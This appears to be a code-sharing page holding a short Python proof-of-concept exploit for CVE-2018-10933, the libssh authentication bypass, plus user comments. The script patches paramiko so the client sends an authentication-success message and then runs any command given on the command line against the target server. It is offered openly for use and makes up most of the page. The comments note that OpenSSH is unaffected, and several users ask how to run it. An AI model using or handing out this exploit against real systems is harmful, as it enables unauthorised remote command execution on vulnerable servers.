CVE-2018-10933-test

#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933 

import sys, paramiko
import logging

username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]

new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
        paramiko.common.MSG_USERAUTH_SUCCESS]

def auth_accept(*args, **kwargs):
    return new_auth_accept(*args, **kwargs)

paramiko.auth_handler.AuthHandler._handler_table.update({
    paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
})

port = 22
try:
    logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.WarningPolicy)
    client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
    stdin, stdout, stderr = client.exec_command(command)
    print stdout.read(),
finally:
    client.close()

from : https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
apparently OpenSSH does not rely on libssh

OpenSSH (which is the standard SSH daemon on most systems) does not rely on libssh.

anyone can confirm this?

Yes, libssh is an implementation of ssh protocol server library, and OpenSSH is an another implementation

what is wrong here ? installed python-paramiko

root@test-VM:/home/test# python3 asd.py
Traceback (most recent call last):
File "asd.py", line 4, in
import paramiko
ModuleNotFoundError: No module named 'paramiko'

What am I doing wrong?

Hi there, I chanced upon this and wondering if you could advise if there is a need for me to have an actual server before I can test this code? Or could I test it locally, eg. In Kali via VirtualBox?